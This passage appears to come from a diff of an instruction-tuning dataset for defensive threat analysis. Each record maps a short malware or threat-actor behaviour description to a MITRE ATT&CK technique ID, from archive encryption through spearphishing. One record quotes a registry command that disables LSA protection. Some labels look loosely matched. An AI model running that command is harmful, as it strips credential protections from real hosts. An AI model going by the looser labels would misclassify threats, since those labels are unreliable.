cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CopyKittens encrypts data with a substitute cipher prior to exfiltration.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FLASHFLOOD employs the same encoding scheme as SPACESHIP for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FunnyDream has compressed collected files with zLib and encrypted them using an XOR operation with the string key from the command line or `qwerasdf` if the command line argument doesn\u2019t contain the key. File names are obfuscated using XOR with the same key as the compressed file content.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAWKBALL has encrypted data with XOR before sending it over the C2 channel.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MESSAGETAP has XOR-encrypted and stored contents of SMS messages that matched its target list.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete's collected data is encrypted with AES before exfiltration.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OwaAuth DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RGDoor encrypts files with XOR before sending them back to the C2 server.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ramsay can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver encrypts collected data with an incremental XOR key prior to exfiltration.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Rising Sun can archive data using RC4 encryption and Base64 encoding prior to exfiltration.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Magic Hound has disabled LSA protection on compromised hosts using `\"\"reg\"\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.\"", + "output": "- T1562: Impair Defenses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stuxnet reduces the integrity level of objects to allow write actions.", + "output": "- T1562: Impair Defenses" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JPIN can lower security settings by changing Registry keys.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "macOS.OSAMiner has searched for the Activity Monitor process in the System Events process list and kills the process if running. macOS.OSAMiner also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"ZR\"\" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.\"", + "output": "- T1562.004: Impair Defenses - Disable or Modify System Firewall" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Waterbear can hook the \"\"ZwOpenProcess\"\" and \"\"GetExtendedTcpTable\"\" APIs called by the process of a security product to hide PIDs and TCP records from detection.\"", + "output": "- T1562.006: Impair Defenses - Indicator Blocking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Axiom has targeted victims with remote administration tools including RDP.", + "output": "- T1563.002: Remote Service Session Hijacking - RDP Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.", + "output": "- T1563.002: Remote Service Session Hijacking - RDP Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bundlore uses the \"\"mktemp\"\" utility to make unique file and directory names for payloads, such as \"\"TMP_DIR=`mktemp -d -t x\"\".\"", + "output": "- T1564: Hide Artifacts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"OSX/Shlayer has used the \"\"mktemp\"\" utility to make random and unique filenames for payloads, such as \"\"export tmpDir=\"\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"\"\"\" or \"\"mktemp -t Installer\"\".\"", + "output": "- T1564: Hide Artifacts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carberp has created a hidden file in the Startup folder of the current user.", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"WastedLocker has copied a random file from the Windows System32 folder to the \"\"%APPDATA%\"\" location under a different hidden filename.\"", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QuasarRAT can hide process windows and make web requests invisible to the compromised user. Requests marked as invisible have been sent with user-agent string `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A` though QuasarRAT can only be run on Windows systems.", + "output": "- T1564.003: Hide Artifacts - Hidden Window" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.", + "output": "- T1564.004: Hide Artifacts - NTFS File Attributes" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit.", + "output": "- T1564.005: Hide Artifacts - Hidden File System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ComRAT has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.", + "output": "- T1564.005: Hide Artifacts - Hidden File System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Regin has used a hidden file system to store some of its components.", + "output": "- T1564.005: Hide Artifacts - Hidden File System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Strider has used a hidden file system that is stored as a file on disk.", + "output": "- T1564.005: Hide Artifacts - Hidden File System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives.", + "output": "- T1564.006: Hide Artifacts - Run Virtual Instance" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as \u201chacked,\"\" \"\"phish,\"\" and \u201cmalware\"\" in a likely attempt to prevent organizations from communicating about their activities.\"", + "output": "- T1564.008: Hide Artifacts - Email Hiding Rules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands.", + "output": "- T1564.010: Hide Artifacts - Process Argument Spoofing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.", + "output": "- T1565.001: Data Manipulation - Stored Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"SUNSPOT created a copy of the SolarWinds Orion software source file with a \"\".bk\"\" extension to backup the original content, wrote SUNBURST using the same filename but with a \"\".tmp\"\" extension, and then moved SUNBURST using \"\"MoveFileEx\"\" to the original filename with a \"\".cs\"\" extension so it could be compiled within Orion software.\"", + "output": "- T1565.001: Data Manipulation - Stored Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.", + "output": "- T1565.002: Data Manipulation - Transmitted Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.", + "output": "- T1565.002: Data Manipulation - Transmitted Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.", + "output": "- T1565.003: Data Manipulation - Runtime Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has used spearphising campaigns to gain access to victims.", + "output": "- T1566: Phishing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT30 has used spearphishing emails with malicious DOC attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bumblebee has gained execution through luring users into opening malicious attachments.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Group has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EnvyScout has been distributed via spearphishing as an email attachment.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Flagpro has been distributed via spearphishing as an email attachment.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private 